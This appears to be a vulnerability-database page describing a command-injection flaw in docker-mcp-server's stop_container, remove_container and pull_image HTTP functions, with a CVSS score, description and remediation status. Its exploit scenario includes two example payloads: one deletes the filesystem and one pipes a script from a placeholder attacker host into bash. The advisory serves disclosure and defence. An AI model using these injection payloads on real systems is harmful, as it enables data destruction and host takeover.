EUVD-2026-19933Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from NVD · only source for this CVE.
CVSS VectorNVD
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
5DescriptionCVE.org
A weakness has been identified in suvarchal docker-mcp-server up to 0.1.0. The impacted element is the function stop_container/remove_container/pull_image of the file src/index.ts of the component HTTP Interface. This manipulation causes os command injection. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.
AnalysisAI
Remote code execution via OS command injection in suvarchal docker-mcp-server through 0.1.0 allows unauthenticated attackers to execute arbitrary commands by manipulating the stop_container, remove_container, or pull_image HTTP interface functions. Publicly available exploit code exists, and while the vendor was notified early through GitHub issue #3, no patch has been released as of the analysis date.
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Vulnerability AssessmentAI
| Risk Assessment | This vulnerability presents substantial real-world risk despite a moderate CVSS score of 6.9. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker sends a crafted HTTP request to the docker-mcp-server interface targeting one of the vulnerable functions (e.g., /stop_container or /pull_image) with a malicious parameter containing shell metacharacters and OS commands (e.g., 'container_id; rm -rf /' or 'image; curl attacker.com/malware.sh | bash'). Since authentication is not required (PR:N per CVSSv4) and the HTTP interface accepts direct input without sanitization, the injected command executes on the host system with the privileges of the docker-mcp-server process, potentially gaining full system control if the service runs as root. … |
| Remediation | No vendor-released patch identified at time of analysis; the project has not responded to early notification. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
More from same product – last 7 days
Unauthenticated remote attackers can invoke MCP tool handlers and exfiltrate the operator's long-lived Meta Graph API ac
Unauthenticated remote code execution in Crawl4AI versions <= 0.8.6 allows attackers to escape the AST-based sandbox in
Privileged GitHub Actions workflow injection in Quest Bot (Discord moderation bot) prior to version 1.0.3 allows remote
Production deployment compromise in Duck Site before 1.0.1 allows remote attackers to push attacker-controlled code as t
Server-side request forgery in Crawl4AI's Docker API server (versions <= 0.8.8) allows unauthenticated remote attackers
Share
External POC / Exploit Code
Leaving vuln.today